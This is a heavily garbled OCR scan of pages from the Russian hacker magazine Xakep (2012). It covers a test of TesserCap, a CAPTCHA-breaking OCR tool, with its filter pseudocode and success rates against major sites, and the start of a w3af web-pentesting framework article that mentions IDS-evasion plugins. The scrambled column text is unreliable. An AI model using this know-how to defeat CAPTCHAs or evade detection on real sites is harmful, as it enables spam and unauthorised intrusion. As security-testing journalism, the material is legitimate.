китайского магазина, оплата через PayPal и бесплатная доставка nрисутствуют,

бы не. зто, то магазин занял бы достойное

отnравки не той модели, а то, что все попытки как-то решить проблему не увенчались

но nосылки отправляют обычной почтой и без

и TinyDeal .

успехом. Возможно , через

трекинга .

PayPal

было бы

место рядом с моими фаворитами FocaiPгice

проще открыть диспут, но не факт.

ЗАКЛЮЧЕНИЕ

можно сэкономить . Если товар без отзывов­

обращайся в службу поддержки. Н е забывай :

В заключен и е хочетс я до ба вить , что о дин и тот

обязательно уточняй комплек тацию и харак­

китайские интернет-магазины лишь для тех,

же товар может быть во многих магазинах,

теристики : нередко присылают нечто отличное

кто может ждать . Е сли что -то нужно здесь и

но по разным ценам. П озтому сначала сравни

от указанного в описании. Чтобы максимально

сейчас, то лучше сюда даже не заглядывать. И

и только потом совершай заказ. Не поленись

обезопасить себя, оплату л у чше пров одить

главное правило: тот, кто ищет, всегда найдет.

поискать в Сети куnоны на скидку, с ними

через PayPal. В случае проблем обязательно

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 1gursev.kal ra!a foundstone .com 1

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы для обхода САРТСНА, которыми защищены с а й ты . Во - первых , суще с твуют с п е ц и альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» из

#1 35

и

#126

Р ас п озна в а н ие СА Р ТС Н А - задача чаще в сего

номеров соответс т венно. Сегодня же я хочу

нетривиальна я . Н а изображение необходимо

ра сс казать тебе о разработке TesseгCap, ко т о ­

накладывать массу раз л ичных фильтров, что­

рую ав т ор называет универсальной решалкой

бы убрать искаже н ия и п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, как ни кру т и.

работчики желают укрепить стойкость за щ и т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

к оторые и спользуют дешевый

Зач а стую п риходится реализо в ыват ь обучае ­

ручно й труд и бу к вально за $1

мую сис т ему на ос н ове нейронных сетей [зто,

Ч то с д елал автор п ро г раммы? О н посмотре л ,

предлагают решить

к слову, не так с л ожно, как може т показа ть­

как обычно подхо д ят к п р облеме автоматизи­

ся], чтобы д обиться п р иемлемого результ а т а

ро в ан н ого решения СА Р ТСНА и по п робовал

по ав т оматизиро в анному р ешению капч. Ч тоб ы

обобщить этот опыт в о д ном и н струмен т е .

понять, о чем я говорю, лу чш е п о д нят ь архи в

Автор заметил, что для удаления ш умов с изо ­

1000

капч.

В к ачестве альтернативы м о ж н о попробовать написать и нтелле к туальную с и стему,

и прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т о ест ь реше н ия самой слож н ой

САР Т С Н А: теория и прак т ика. Р азбираемся,

задачи при распознавании капч, чаще все г о

как л омают ка п чи» и << П о д смо т рим и рас п озна-

применяются одни и те же фильтры. П олучает-

кот орая по опред е ленным

алгор и т м а м будет сама выполнять распознавание .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее теперь можно

HMLR

р е ал из ова т ь с по м ощью

с пец и альной утилиты .

01,2

С хема анализа САРТСНА- изображени й с помощью

TesserCap

ХАКЕР

03/158/2012


Проверка на прочность

с я, что если реализовать удобный инструмент, позволяющий без сложных математических

~ ~-

.....

-

преобразований накладывать фильтры на изо ­

[: 4152\4'] ~ ~~-- ·::

бражения, и совместить его с ОСR-системой

-

- -

... _

вполне работоспособную про грамму. Это, с обстве нн о, и сделал Гурсев Сингх Калра

из компании

McAfee. Зачем

--·==

... 1

L41 ~2~

для распознавания текс т а, т о можно получить

з т о было нужно?

1

41~2\А

Автор утили т ы решил таким об раз ом про­

\ 'О=

верить, насколько безопасны капчи к рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 1

~- ,------

""---""""""""'

Wiilli)

о

-

.

.

1 ~- 1 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

11~

l ~k l 1 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

105Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная обработка изображений и и з влечение

Кандидатами на участие в т естировании стали

текста из капчи

Wikipedia,

еВ ау, а также

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

11 о 1 1" liJ G 1 1 ~269

посещаемыми по версии известного сервиса

такие монстры, как

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru с предварительной обработкой изображений . Судя по результатам, фильтр подобрать не удалось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно о ценить результаты рас по з нав а н ия

принцип функционирования программы, т о о н

стает окно с тре мя вкладками:

изображений, о тм етив каждый из них как

достаточно прост. Исходная капча поступает

lmage

в систему предварительной обработки изо­

содержит элементы управления, которые

няя, наиболее значимая функция служит для

бражений, очищающей кап чу от всяких шумов

исnользуются для зап у ска и остановки теста

передачи любого изображения в систему nред­

и искажений и по конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, в которой задается

лученное изображение ОСR-системе, которая

ти стики т еста !сколько отга дан о, а сколько

фильтр, удаляющий с изображения шумы и ис­

с тарается распознать текст на нем . TesseгCa p

нетl, навиг а ци и и выбора изображения для

каже ния. Чт обы передать кар т инку в сис т ему

имеет интерактивный графиче ский интерфейс

предварительной обработки. В поле для ввода

предварител ьн ой обработки, на д о щелкнуть

и обла да е т следующими свойст в ами :

URL-aдpeca должен быть указан точный

на требуемом изображении nравой кноnкой

Е сли рассматривать в об щи х черта х

1.

2.

3.

Ma in, Options,

P гepгocessing. Основная вкладка

коррек т н ы й или некорректный . Н у и послед­

URL-

Имеетуниверсальную систему пре двар и ­

aдpec, который веб-приложение использует

мыши и в кон т екс т ном меню выбрать пункт

тельной обработки изображений, которую

для извлечения капч. URL-aдpec можно по­

Send

можно на строить для каждой отдельной

л учить следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

к н о nко й мыши

Включает в себя сис тем у распознавания

скопировать или просмотреть код страницы

Вкладка о пци й со д ержит различные злементы

Tesseгact, которая извлекаеттекст из пред­

и извлечь URL-aдpec из атрибута sгс тега изо ­

уnравления для конфигурирова ния TesseгCap.

варительно проанализированного и под­

бражения

Здесь можно выбрать ОСR-систему, за д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто адрес www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name = xakep . гu . Ряд ом со стро-

сацию и предварительную обработку изобра­

ко дир овок в системе распознавания .

к ой а др еса находится элеме нт, задающий

же ни й, добавить пользовательские НТТР­

к оличество капч, которые н ужно загрузить

за головки , а также указать диапаз о н символов

Думаю, общий смысл понятен, поэто м у

для тестирования. Та к как приложение может

для системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, в случае с

xakep.

предлагаю посмотреть, как это выглядит .

одновременно nоказывать только

Универсал ьн ость утилиты н е могла не приве­

б р ажений, в нем предусм��трены элементы

сти к усложнению ее интерфейса, п оэтому ок н о

у пр авления для постраничного п ролистывания

программы может вв ести в небольшой с т у пор .

загружен ны х кап ч . Та ким образом, при мас­

12

изо­

параметры веб-прокси, включить nереадре­

в нижнем регистре, буквы в верхнем регистре , сnециальные символы.

Теперь о каждой оnции поподробней . Пр еж д е всего, можно выбрать ОСR-систему.

Так что, перед т ем как п ереходить н е п ос ред­

штабном тестировании мы сможем nроли­

П о умолча нию д оступна только одна ­

ствен н о к ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр осматривать

Te sseгact -ORC , так что замора чивать ся

разобраться с ее интерфейсом и заложенным

результаты их распознавания. Кнопки Staгt

с выбором т ут не придется. Еще одна очень

функциона л ом.

и

интересная возможность программы- вы­

Stop запускают

и оста н ав лива ют тестиро­

вание соо тветствен но. По с ле те с т ирования

бор диапазона символов . Возьмем, напри­ мер, капчу с xakep . гu- видно, что она не со­

д е ржит н и одной букв ы , а состои т т о льк о из цифр. Так зачем нам лишние символы, которые только увеличат вероятность не кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни к чему, поэтому при тестировании капчи

xake p.гu лучше указать, что она содержит Мы не могли не сказать х отя бы пары слов об

Подразделение профессиональны х услуг

о дни цифры: Num eгics. Но что если выбрать

авторе замечательной утилиты TesseгCap .

FoundstoneФ, в котором он трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные услуги и обучение,

п ознать капчу, состоящую из заглавных букв

главным консультантом в подразделении

обесnечивает nостоянную и действенную

любого языка? Н ет, не сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов от самых серьезных угроз.

рет список символов, используемых для рас­

в х одит в состав

Команда nодразделения nрофессиональны х

познавания, из конфигурацио нны х файлов,

услуг состоит из признанных экспертов

находящихся в \Ргоgгаm

в области безоnасности и разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал на таких конференциях, как Тоог­ Соn ,

NuiiCon

и

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap и SSLSmaгt . Помимо

имеющих богатый оnыт сотрудничества

П оясню на прим ере : если мы выбрали

это го , разработал несколько инструментов для

с международными корnорациями

опции Numeгics и L oweг

внутренних нужд комnании . Любимые языки

и государственными организациями

обратится к файлу loweгпumeгic, начинаю­

по воnросам безоnасности .

щ емуся с параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 2012

Ruby, Ruby on Rails

и С#.

Case,

то пр ограмма


PCZONE За ним следует список символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут использоваться для решения капчи.

PREPROCESSING

По умолчанию в файлах содержатся только

Н у вот мы и добрались до самой интересной

буквы латинского алфавита, так что для рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы надо заменить или

для у д а л е н ия с капч различных шумов и раз­

мытий, которые стараются максимально

дополнить список символов.

Теперь немного о том, для чего нужно поле

Http Request

Headeгs. Например, на не­

Процесс настройки универсального фильтра предельнопрости состоит из девяти эта п ов.

того чтобы увидеть капчу. Чтобы TesseгCap

Изменения изображения отображаются на

смогла получить доступ к капче, программе

каждом этапе предварительной обрабо т ки.

необходимо передать в запросе НТТР такие

Кроме того, на странице имеется компо-

заголовки, как Ассер!,

нент проверки, который позволяет оценить

и Rеfеггег

и т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs и т. д.l, можно перехватить посылаемые заголовки запро­

са и ввести их в поле ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- это

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

20-30%

ЕЬау

20-30%

reddit.com

20-30%

CNBC

>50%

foodnetwoгk.com

80-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи при

Http Request

Follow

САЙТАХ

усложнить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, для

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

1.

Инверсия цвета

Дело в том, что TesseгCap по умолчанию

пикселей для САРТСНА-изображений. Код,

не следует переадресации. Если тестовый

представленный ниже, демонстрирует, как это

pasteЬin.com

70-80%

URL-aдpec должен следовать переадресации

происходит:

cavenue.com

>80%

для получения изображения, нужно выбрать эту опцию.

Ну и осталась последняя опция, вклю­

чающая/отключающая механизм предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная обработка изображений отключена. Пользователи сначала настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты для всех пикселей изображения.

{

Каждое числовое поле может содержать

if (invertRed is true) new red = 255 - current red if (invertBlue is true) new Ыuе = 255 - current Ыuе if ( inve r tGree n is true) new green = 255 - current green

компонентов каждого пикселя в зависимости от значения в поле выполняются следующие

действия:

1.

САРТСНА-изображениям и затем активируют загружаемые после включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если значение равно

-1, соответствующий

цветовой компонент не меняе т ся.

ки изображений согласно тестируемым этот модуль . Все СА РТ СНА-изображения,

257

lот -1 до 2551 возможных значений. Для RGВ­

2.

Если значение не равно

-1,

все найденные

компоненты указанного цвета !красный, зе­

Инверсия одного или нескольких цветов

леный или синий] меняю т ся в соответствии

часто открывает новые возможности для про­

веркитестируемого САРТСНА-изображения.

с введенным в поля значением. Значение О удаляет компонент, значение

тельную обработку и уже затем передаются в ОСR-систему Tesseгact для извлечения

Этап

2. Изменение

цвета

текста.

На данном шаге можно изменить цветовые

255 устанав­

ливает его максимальную интенсивность

и т. д.

Этап

3. Градация

серого !Шкала яркости)

На третьем эта п е все изображения конверти ­ руются в изображения в градациях серого . Это Chop"""' O Activ.ste

11 <· 1 t~

единственный обязательный эта п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости от выбранной кнопки выполняется одно из следующих действий, связанных с цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 10.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

1.

В зависимости от интенсивности и рас­

пределения цветовой составляющей САРТСНА любой из этих филыров может улучшить @ Smooth Mack 1

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 1

0

извлекаемое изображение для дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

4.

Сглаживание и резкость

Чтобы усложнить извлечение текста И з мен е ни е по м ех при изменении различны х д и апазонов цветового з начения пи к сел ей в сторону белого или черного

из САРТСНА-изображе н ий, в них д обавляют

Х АКЕР

03 /158/2012


П рове р ка на п ро чн ос ть

шум в форме однопиксельных или многопик­

выдается ошибка и маска не при меняе т ся.

Этап

сельных точек, посторонних линий и пре­

П ри выборе фиксированной маски кнопку

Это т фи льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

использовать не требуется.

5. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г о

Passes

Cutoff.

В числовом поле

следует указать, сколько раз нужно

ния уров н я серо г о о т частоты

(cutoff) встречаемос т и

работы о т секаю щ его фи льт ра п оказа н ни же

устранения которого потом используются

или

Настройка отсечения

и предлагае т выбрат ь отсечение . П ри нц и п

изображения возрастает случайный шум, для

Bucket

6.

оттенки серого

в п сев д око д е :

пиксели могут быть окрашены в широкий

применить с~ответствующую маску изобра­

диапазон оттенков серого. Этот фильтр ото­

жения перед переходом на следующий этап.

бражает распределение градаций серого

Давай рассмотрим компоненты фильтра для

в

сглаживания и повышения резкости. Доступ­

пикселей, окрашенных в оттенки серого

ны два типа масок изображения:

в диапазоне от О до

20 баке т ах [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан в ба кете О,

if (pi xe l 's gr ays cal e value <= Cutoff ) pixel graysca l e val ue = ( е OR 255) - > в зави с им о сти, о т т о го как а я опция выбра н а (<= и ли => : Set Every Pi xel with valu e <=/ => Th r eshold t o е. Rema i ning t o 255 )

Фиксированные маски. По умолчанию

процент пикселей, окрашенных в о тт енки

TesseгCap имеет шесть наиболее популяр­

серо г о в диапазоне от

ных масок изображения. Эти маски могут

сглаживать изображение или повышать

из следующих действий для каждого диа­

ние пикселей САР Т С Н А по цвета м и п омо г ае т

резкость [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

удалить п омехи с помощью отсе ч ения з н а ч е­

менения отображаются сразу же после вы­

серого:

ний уро вн я серого .

бора маски с помощью соответствующих

1. Остави т ь без измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

13

до

25,-

в ба кете

т. д. Пользователь может выбрать одно

7: Обтесывание (choppiпg)

После применения с глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п о д роб н ое рас пр е д е л е ­

Бла г одаря этим оп ц иям можно контроли­

bucket-

и д ругих фи л ьтро в САР Т С Н А ­

изображе н ия всё е щ е могут быт ь за ш у м ле н ы

вводя значения в числовые поля и нажи­

ровать различные диапазоны оттенков се­

однопиксельными или много п иксе л ьными

мая кнопку

рого, а также сокращать/удалять шум, меняя

точками, посторонними линиями и п реетран ­

оттенки серого в сторону белого или черного.

етвенными искажениями . П рин ц и п рабо т ы

Save Mask . Если

сумма коэф­

фициентов в этих окошках меньше нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается в следую­

меняет его значение уровня серого новым,

щем: если количество смежных пикселей,

как показано ниже в псевдокоде. Инверсия

окрашенных в данный оттенок серого, мен ь ше

серого проводится для подгонки изображе­

этой утилиты, и теперь неплохо было бы про­

величины в числовом поле, фильтр обтесы в а­

ния под ц в етовые настройки ОСR-системы.

тестировать какую-нибудь капчу на прочность.

ния п рис в аивает им з н аче н ие О [ ч ерный ! или

255 [белый! п о в ыбору п о л ьзователя. П ри э т ом САР Т С Н А анализируется как в горизонталь­ ном, так и в вертикал ь ном направлении.

Ну что ж, пожалуй, мы рассмотрели все опции

Предлагаю для примера взять кап чу xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value = 255 - current graysc al e value

Итак, запускаем утилиту и идем на сайт журнала . Видим список свежих новостей, за­ ходим в первую попавшуюся и пролистываем

до места, где можно оставить свой коммента­ Этап

8: Изменение

ширины границы .

Этап

10: Проверка

распознавания капчи

рий. Ага, коммент так просто не добавить [еще бы, а то бы давно уже всё эаспамилиl- нужно

Как у тв ерж д ает автор ути л и т ы, в ходе

Цель данного этапа - передать предвари­

п ерво н ачаль н ых и сс л е д ова н ий и разра­

тель н о обработанное САРТС Н А-изображение

вводить капчу. Н у что ж, проверим, можно

ботки TesseгCap он неоднократно отмечал,

ОСR-системе для распознавания. Кнопка

ли это автоматизировать . Копируем

что, когда САРТСНА-изображения имеют

Solve

берет изображение после фильтра

URL

картинки и вставляем его в адресную строку

толстую граничную линию и ее цвет отлича ­

инверсии серого, отправляет в ОСR-систему

TesseгCap . Указываем, что нужно загрузить

ется от основного фона САРТСНА, некоторые

для извлечения текста и отображает воз­

капч, и нажимаем Staгt . Программа послушно

вращенный текст в графическом интер­

загрузила

Д анный фильтр п редназ н ачен для обрабо т ки

системы

фейсе. Если распознанный текст совпадает

познать. К сожалению, все капчи оказались

OCR

не могут рас п ознать текст.

12

12

картинок и попыталась их рас­

граничных линий и их изменения. Граничные

с текстом на капче, значит, мы правильно

либо не распознаны, о чем свидетельствует

линии с шириной, которая указана в число­

задали фильтр для предварительной об­

надпись

вом поле, окрашиваются в черный или белый

работки. Теперь можно перейти на вкладку

неправильно. В общем, неудивительно, так

по выбору пользователя.

опций и включить опцию предварительной

как посторонние шумы и искажения не были

обработки [ЕnаЫе

удалены. Этим мы сейчас и займемся . Жмем

Этап

9: Инверсия

серого оттенка

Это т фи л ьтр п роходит каж ды й пиксель и за-

lmage Pгepгocessiпgl для

-Failed-

под ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши на одну из

капч.

женных картинок и отправляем ее в систему

12

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка на пр о чн ость

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев все

ЗАКЛЮЧЕНИЕ

В конечном итоге, как я ни бился, нормально

САРТСНА - изображения являются одним

распознать кап чу у меня так и не получилось .

из самых эффективных механизмов по защите

ры, поэтому идем на вкладку опций и указы ­

Пришло сь экспериментировать с pasteЬin.

веб -приложе ний от автоматизированного за­

ваем, что распознавать нужно только цифры

com,

[Сhагасtег

12

капч, видим , что они содержат только циф­

Это, как видишь, совер шенно неверно.

которые без проблем удалось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить на вкладку lmage Pгepгocessing

познать. Но если ты окажешься уси дчивее

защити ть от случайных роботов и не устоят

и терпеливее и сумеешь получить кор­

перед целенаправленными попытками их

для настройки фильтров. Сразу скажу, что

ректное распознавание капч с xakep.гu, то

решить. Как и криптографические алгоритмы,

п о игравшись с первыми тремя фильтрами

сразу заходи на вкладку опций и включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные и обес п ечи в ающие вы сокий уро­

<< Градация серо г о » ] я не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, поэтому оставил там

на

и, кликнув на Staгt, загружай свежую

способом защиты. На основе статистики,

всё по дефолту. Я выбрал маску

порцию капч, которые теперь будут пред­

которую привел автор программы, я выбрал

варительно обрабатываться твоим филь­

для своих п роектов гeCaptcha и буд у реко­

Smooth Mask

установил количество про ходов равным

Main

тром. П осле того, как программа отработает,

мендова ть ее всем своим друзьям- она ока ­

залась самой стойкой из протес т ированных.

которых меньше, нужно установить в О, а те,

отметь корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С этого момента можно просма­

которых больше, в

тривать сво дн ую статистику по распознава­

полуавтоматизированное решение САРТС Н А.

нию с помощью

Через специальный

одному. Фильтр Gгayscale

buckets

я пропустил

и перешел сразу к настройке отсечения . Вы­ б рал значение

154

и указал, что те пиксел и,

255.

Чтобы избавиться

о т оставшихся точек, включил

chopping

и из­

Show Statistics . В

общем-то ,

В любом случае не с тоит забы вать , что в Сети есть нема ло сервисов, которые предлагают

API

ты передаешь серви­

это своеобразный отчет о защищенности той

су изображение , а тот через непродолжитель ­

фильтр включать не было смысла, поэтому я

или иной САРТСНА. Если стоит вопрос о вы­

ное время во звра щает решение . Решает ка пч у

с разу нажал на

боре того или др угого решения, то с помо­

реальный человек [например, из Китая ] , п о­

щью TesseгCap вполне можно провести свое

лучая за это свою копеечку. Ту т уже никакой

собственное тестирование.

защиты нет : ]. ::::к:

менил ширин у границы до

10. Последний

Solve.

На капче у меня было число н о программа распознала его

714945, как 711435.

Содержание в дыме сигареты: смолы - 4; 7 мг, никотина- 0,4; 0, 6 мг, С О- 5; 8 мг

1Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара с Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

для веб-пентестера

·~

Ин форм ац и я пред ст авп е н а и с кл юч и т ел ьно для о з н ак о м ления .

Редакция не нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

за е е использование в прот и во з а к о н ны х

целя х. nодобные

де йствия вл ек у т з а с обо й уголовно е преследование .

Прое к т wЗaf с и льно выделяется сред и мног их други х инструм е нтов для ис с ледования

безопасности веб-приложени й. Это

не обычны й сканер с жестко забитым функционалом , а фреймвор к, позволяющи й

и спользовать более сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н и я уже мало чем похожи н а своих п ред­ ш естве н нико в , ко т ор ы е бы л и в ход у е щ е п я т ь л ет н аза д . Они стано ­ вятся всё более популярными, ис п ользуют намного больше техно­ логий, что увеличивает возможный вектор атаки, обрабатывают всё больше разной информации, включая финансовые и переанальные данные . Чтобы снизить риски, мы можем внедрить процес с безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является тес т иро в ание безопас н ости. Услов н о говоря , можно выде­ лить чет ыре в ида тестиро в ания безопасности веб - приложения :

1. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня я хочу рассказа т ь о проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , который может быть исполь зова н для для тестирования бе зо пасности в еб-приложения

первых двух видов тестирования. Автором этого открытого проекта является Андреас Рианчо из Аргентины. Сейчас проект разрабаты­ вается nреимущественно им и небольшой гру nn ой контрибьюторов

со все г о мира, в ко т орую вход ит и ав т ор этих строк

,._ ~.ы. jNII'amtWI axllt

ним также принимают активное участие такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе на д

Thll ptugln 1nr:ts СIОМ 5118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

как

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

и Я ндекс! Фреймворк написан на

Python,

который, как ты

знаешь, является << языком с батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось уже больше сотни. Это, конечно, еще не

Mozilla

Fiгefox, но уже достаточно мощное средство .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

1:3

111111'A:18f01CМC~~s l 3

о

1 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит из двух важных частей: ядра и плагинов.

Главное окно wЗaf

Ядро запускает главный nроцесс и координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк для пенте с т ера

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

к в еб -nрил оже нию и его ответах . Если о nять пров ес ти аналогию

.

с миром

(вrutforce) ~ : •

1

UNI X, это фактически эквива л ен ттекс т ово го nотокового sed, н о ужедля НТТР-транз акций. Заме нить во всех от­

редактора

ветах hidd en -n oля на обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются для обхо д а nростых nравил раз­

7.

личных 105. Хо чеш ь nодальше оставаться незамече нным nр и nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь из этого набора.

8.

Оutрut-nлагины выn ол няют простую миссию: формируют в удо бо­ читаемом виде о т четы о результатах работы wЗaf. Вы бирай, что тебе больше nодходит-<<nравославныЙ >> текстовый форма т или

И нфо рмаци о нный nоток в wЗaf

<<э нтерn райз н ый>>

POF,-

или nо-быстрому наnиши более nод­

ходящий для твоих нужд nлагин . а так же обме н инфо рмации между ними. Плаг ины, в с в ою очередь,

9.

Аuth-nлагины берут на себя весь nроцесс уnравления nоль­

находятуязвимости и п озволяют пр оэкс пл уа тировать их. Ч ерез ядро

зо в ательской сессией: авторизируются в веб-nриложении,

плагины обмениваются информацией, к прим еру, о найденн ых запро­

nроверяют, чтобы сессия оставалась вали дн ой, и выnолняют в

сах для фаззинга. В к аче с тве ц ентрального хранилища информации

конце сканирования корректный выход из веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

о ч е нь уд обно. Ещ ё со в сем н е давн о не б ыл о удоб н ой возможности

Слово «фрейм ворк >> в названии разработки у п отребляется не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, в то время как весь функцио­

сканировать nользовательские части веб-приложений, то ес ть те, что на хо дятся за авторизацией. Да , можно было указать wЗaf

нал для пентеста реализован в разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную и з браузера куку, н о

ск анир ова ния ты можешь выбирать только нужные тебе аддоны,

это н е самый уд обный сnособ. Сейчас в составе wЗaf всего один

комбинируя их. Плагин каж дого типа, котор ы х в общей сложности на­

аuth -n лагин, но он nодойдёт для большинства случае в. Д а и не

счи тываетс я восемь, отвечает за выполнение о пр е деленной за дач и .

забывай, что мы имеем д ело с фреймворком, и можно наnисать

1. Плагины для поиска в оз можны хточек в хо да в пр иложение !или та к

такой nлагин nрактически для любой формы ауте нт ификации:

называемые disсоvегу-плагиныl собирают формы , ссылки и вообще

SMS, токены

и т.n . У тебя в руках вся мощь Python!

всё, что можетсгенерироватьзапрос к в еб- пр иложению. Та ким об­ ра зо м формируется карта запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является классический веб-паук ,

Теnерь, когда мы не много разобрались с архитектурой wЗaf, настало

скаются в цикл е, благодаря ч ему цели , обнаруженные на пр е дыду­

время у видеть его в д ействии. Сnециа льн о для д емо н с трации я на­

щем этапе, п о падают на в хо д этих же плаг ино в на следующем э тап е.

nисал nростое, но оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п о р, n ока не будет д ос тигн ут

наnравленнос т и nод названием ltte г. Да , это сер в ис для ведения

лимит, установленный для режима nои ска цел ей для фаззинга.

2. Аудит-nлагины исnользуютвывод nлаг инов !то есть т очки входа в nриложениеl для n оиска у я з в и мастей, кот орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI и множество

микроблогов, и , я над еюс ь , он ста н е ттаким же nоnулярным, как его

ограниченный

